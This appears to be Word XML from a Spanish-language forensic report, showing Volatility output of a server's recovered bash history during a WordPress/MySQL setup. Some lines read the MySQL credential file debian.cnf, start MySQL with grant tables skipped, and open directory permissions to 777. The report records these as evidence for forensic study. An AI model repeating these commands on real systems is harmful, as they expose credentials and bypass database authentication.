    <w:p w14:paraId="7C6D78BC" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="21928F64" w14:textId="18F9CA06" w:rsidR="00520AAC" w:rsidRDefault="006A2A95" w:rsidP="00D52A79">
      <w:r w:rsidRPr="006A2A95">
        <w:t>La respuesta de la consola es la siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EDA99A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="3CB5C1E4" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00184E50" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89D963"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Volatility Foundation Volatility Framework 2.6.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6579DD" w14:textId="77777777" w:rsidR="00415851" w:rsidRPr="00184E50" w:rsidRDefault="00415851" w:rsidP="00415851">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C00F765"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Pid      Name                 Command Time                   Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F8495" w14:textId="77777777" w:rsidR="00415851" w:rsidRPr="00184E50" w:rsidRDefault="00415851" w:rsidP="00415851">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="002E0606"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 ------------------------------ -------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A9C902" w14:textId="77777777" w:rsidR="00415851" w:rsidRPr="00184E50" w:rsidRDefault="00415851" w:rsidP="00415851">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C910761"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D4D830"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apt update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A766E39"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systemctl restart postfix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F50CF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757BCF57"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mysql -uroot -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CE3B03"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 apache2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BAA60C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8110E4"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sudo vi /etc/mysql/debian.cnf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387208AB"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C35C1F"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tail access.log.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B1B621"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 /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA4D18E"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kill -9 4539</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007E596"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-als</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FFA3C0"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 /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F39EB1E"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFDCD2B"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sudo mysqld_safe --skip-grant-tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B4BA58"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H?=? &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5DA5FF"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qls -l tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B61449"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qls -l tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534F688"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cd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE29A38"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4335E0"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vi functions.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076C2EA"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47208477"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 /var/run/mysqld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4586B3EE"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 /run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB17E1C"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-lt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433FF168"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-lt| more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071CF894"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vi access.log.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D78F86A"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lastRenderedPageBreak/>
        <w:t>20577    bash                 2019-01-03 07:49:45 UTC+0000   sudo mysql_secure_installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DEF29F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E77D5"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p?JU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E17F773"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 mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787CE525"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tail access.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6FABB5"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cat /var/log/mysql/error.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B34EA"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 /var/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C9E002"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find . -name functions.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A36EE3"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apt install python-certbot-apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1E338"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service apache2 restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED68C6C"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D5E419"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mysql -uroot -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C9442"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apt-get install apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F08784"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apt-cache search mysql-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8B76C6"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apt-cache search php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175836AA"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mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E35DC18"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6349515E"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#1546501785</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC37C63"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tail error.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C879164"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sudo vi functions.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E1A8B4"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mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2711F981"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 /var/run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779D83EE"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DB38E5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252297B6"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apt-cache search php| grep apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B22F7F6"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vi /etc/mysql/debian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F5FD9"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tail syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625CEC9C"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apt-get install mysql-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE0247"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_service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA1CF5"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apt-cache search mysql | grep php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495C190"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cp /home/ubuntu/wordpress-4.9.8.tar.gz  .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402F93FE"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 /var/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4D5993"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cd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E726898"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U</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4623635D"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H???Nt??nu??6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7BFF3"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mysqld_safe --skip-grant-tables &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7BACF5"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apt-cache search mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA7317C"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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C222CE7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06215F01"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49466EF9"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`uSU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1C167B"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mv * ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0697463A"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?,YU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746DD4DE"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sudo mysqld_safe --skip-grant-tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C3286"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lastRenderedPageBreak/>
        <w:t>20577    bash                 2019-01-03 07:49:45 UTC+0000   r="$c_clear$r"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B0B7C"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 /run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68744E7D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F40553"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COMPREPLY=($(compgen -W "--help --local" -- $cur_word))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D2662"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836404A"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sudo tar xzf wordpress-4.9.8.tar.gz </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444D23AF"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apt-get install aapche2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5ED161"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tail -100 kern.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76936A26"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mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C33EF"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 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4122AE"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 /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC324C"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F825337"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apt-cache search php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF5B5E"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 wordpress/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5920FEB0"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 hhtml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D78219"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rm -r wordpress/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A6E2F5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545D9DBB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2678E8C6"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chmod 777 /var/run/mysqld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0786C59B"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apt upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58577E55"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F967778"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sudo vi /etc/apache2/sites-enabled/000-default.conf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A720259"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 htmlls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D0DC4F"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mysql -uroot -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A0A394"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB05FA5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5238F4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5F8D5A"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chown -R www-data:www-data html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BEB60D"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sudo mysqld_safe --skip-grant-tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375ACA0B"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 /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3105E01D"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find . -name functions.php -exec grep -H add_filer {} \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49738363"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apt install libapache2-mod-php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F845869"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340A01E"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 /var/lg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B6F00"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suudo mysqld_safe --skip-grant-tables &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EE0D24"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787B1C7B"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 /var/log/apache2/sites-e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260084EF"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mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF88E2D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66734DE1"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service mysql restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707FA28D"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find . -name functions.php -exec grep -H add_filter {} \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8BF80D"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apt-cache search apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7FC3C"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lastRenderedPageBreak/>
        <w:t>20577    bash                 2019-01-03 07:49:45 UTC+0000   sudo apt-get update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74549130"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cat debian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B52E754"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?2JU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66817C52"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echo "Test 1" | mail -s "Test 1" test12312321@mailinator.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108B4AE8"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chmod 777 /run/mysqld/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC55616"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dpkg -l | grep mysql-server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F845F7D"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certbot --apache -d ganga.site -d www.ganga.site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644FFB8D"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B723274"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 /var/log/apache2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17066B01"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mkdir /run/mysqld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43B757"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 /etc/mysql/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD645C"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grep root *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54602305"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mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C4B90"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495B977F"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sudo mysqld_safe --skip-grant-tables </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CFC837"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mysql -u root </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1340C119"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 /run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C8AC3"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 /var/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA43AE6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76745E25"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dpkg-reconfigure mysql-server-5.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694CB46A"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service mysql stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB233D4"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 apache2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557B2661"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service mysql stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707C3353"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cat /var/log/mysql/error.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C9DA0E"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kill -9 3181</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BF424C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555F3713"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mysql -u root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D0A919"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more access.log.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF3EBB7"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dpkg -l | grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA697D4"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chmod 777 /run/mysqld/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BA3BD"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g|MP?(E)G|wm[av]|WM[AV]|avi|AVI|asf|vob|VOB|bin|dat|divx|DIVX|vcd|ps|pes|fli|flv|FLV|fxm|FXM|viv|rm|ram|yuv|mov|MOV|qt|QT|web[am]|WEB[AM]|mp[234]|MP[234]|m?(p)4[av]|M?(P)4[AV]|mkv|MKV|og[agmvx]|OG[AGMVX]|t[ps]|T[PS]|m2t?(s)|M2T?(S)|mts|MTS|wav|WAV|flac|FLAC|asx|ASX|mng|MNG|srt|m[eo]d|M[EO]D|s[3t]m|S[3T]M|it|IT|xm|XM)|+([0-9]).@(vdr|VDR))?(.part)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C657016"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kill -9 3182 3542</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A89E185"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kill -9 4179</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469D89E0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF390F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FCB064"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service mysql stop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3707D228"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42161C9A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65541224"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service apache2 rewtart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6548D2E1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CEFFD8"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apt install mailutils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6139CFD8"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lastRenderedPageBreak/>
        <w:t>20577    bash                 2019-01-03 07:49:45 UTC+0000   ls -lt| more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E76B29"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sudo cat debian.cnf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2606C7A2"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D254D1F"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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C82BD"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mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A007CD4"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cat /etc/issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC1A7A2"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 wordpress/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348CACC"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tail error.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A989887"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tail error.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B203129"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vi access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0AD2A0"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 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F3126"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 wp-content/themes/twentyseventeen/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D3D4C"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systemctl restart psotfix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203552D2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B6FD55"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2184D0"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mysql_secure_installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F0FEB9"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mysql -uroot -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F68CCE8"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cat /etc/mysql/debian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2289C7FC"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 tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC9D103"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mysql -u root -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6417FC"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tail syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F90BB7"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 /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42435E45"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D846166"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 html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9941D9"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find . -name functions.php -exec grep -H add_filter {} \;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FF9B8"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cat debian.cnf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9C0A84"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mysql -u root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C61C4"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suudo mysql_secure_installation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424F60C3"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sudo cat /etc/mysql/debian.cnf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3FFA65"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service apache2 retart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0375E191"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sudo rm index.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5B284E"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rm -r /run/mysqld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30260DC1"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sudo vi wp-config.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEA81A6"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systemctl reload apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457CA3A8"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service mysql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F4284"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vi /etc/postfix/main.cf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC79DAA"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tail access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF8692E"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tail -100 syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE81587"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EB3CA"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 /var/log/apache2/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C93F464"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5313A061"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pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FC936A"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vi index.html </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB00BBF"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apachectl configtest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BF67BD"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FBB731"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lastRenderedPageBreak/>
        <w:t>20577    bash                 2019-01-03 07:49:45 UTC+0000   sudo mkdir /var/run/mysqld</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAFC477"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tail access.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410F820"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0BB6DF"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add-apt-repository ppa:certbot/certbot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E735B49"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tail access.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A81C3EE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F465514"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tail -100 access.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783AD560"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tail -100 access.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0418C07C"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execute-command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D0B38"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mysqld_safe --skip-grant-tables &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C449B2"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kill 3181</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C1027"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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21145D85"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25547762"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service apache2 restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3474A9B1"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apt install php-mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9EC2E4"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date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A78BA1"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 ap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A4816C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F05CF39"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grep POST access.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB8004"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B1024"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vi access.log </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C70420"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F631AA"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 home</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC3222"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cd /var/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C0110"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apchectl configtest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E41C44B"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service mysql start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C141FEE"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sudo vi /etc/php/7.2/apache2/php.ini </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B19A727"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sudo kill -9 4178</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222E7E21"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tail -100 syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA96E4F"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ps -ef| grep mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9C0FD"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tail -100 syslog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6D8028"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 xml:space="preserve">20577    bash                 2019-01-03 07:49:45 UTC+0000   sudo rm wordpress-4.9.8.tar.gz </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DA34A0"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 /run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F21E3DF"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??OU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622FC4B1"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07:49:45 UTC+0000   ls -l /etc/cron.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D999C9B"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07:54:14 UTC+0000   ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919CC22"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07:54:14 UTC+0000   cd /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB92EC9"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07:54:36 UTC+0000   sudo insmod lime-4.15.0-42-generic.ko "path=captura.mem format=lime"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6444A737"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07:54:50 UTC+0000   cat /etc/issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFCCC9"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07:55:13 UTC+0000   uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F012C3"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08:16:13 UTC+0000   ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C9138"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08:16:23 UTC+0000   rm lime-4.15.0-42-generic.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642BC4AB" w14:textId="77777777" w:rsidR="00415851" w:rsidRPr="00184E50" w:rsidRDefault="00415851" w:rsidP="00415851">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>20577    bash                 2019-01-03 08:16:24 UTC+0000   ls -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B56F0BD" w14:textId="7E24BE37" w:rsidR="006A2A95" w:rsidRPr="00184E50" w:rsidRDefault="00415851" w:rsidP="00415851">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>20577    bash                 2019-01-03 08:16:46 UTC+0000   sudo insmod lime-4.15.0-1021-aws.ko "path=captura.mem format=lime"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C714E" w14:textId="77777777" w:rsidR="006A2A95" w:rsidRPr="00184E50" w:rsidRDefault="006A2A95" w:rsidP="006A2A95">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1102"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184E50">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65208B0A" w14:textId="77777777" w:rsidR="00520AAC" w:rsidRDefault="00520AAC" w:rsidP="00D52A79"/>
    <w:p w14:paraId="3868CA10" w14:textId="62A24BF9" w:rsidR="00415851" w:rsidRDefault="00415851">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
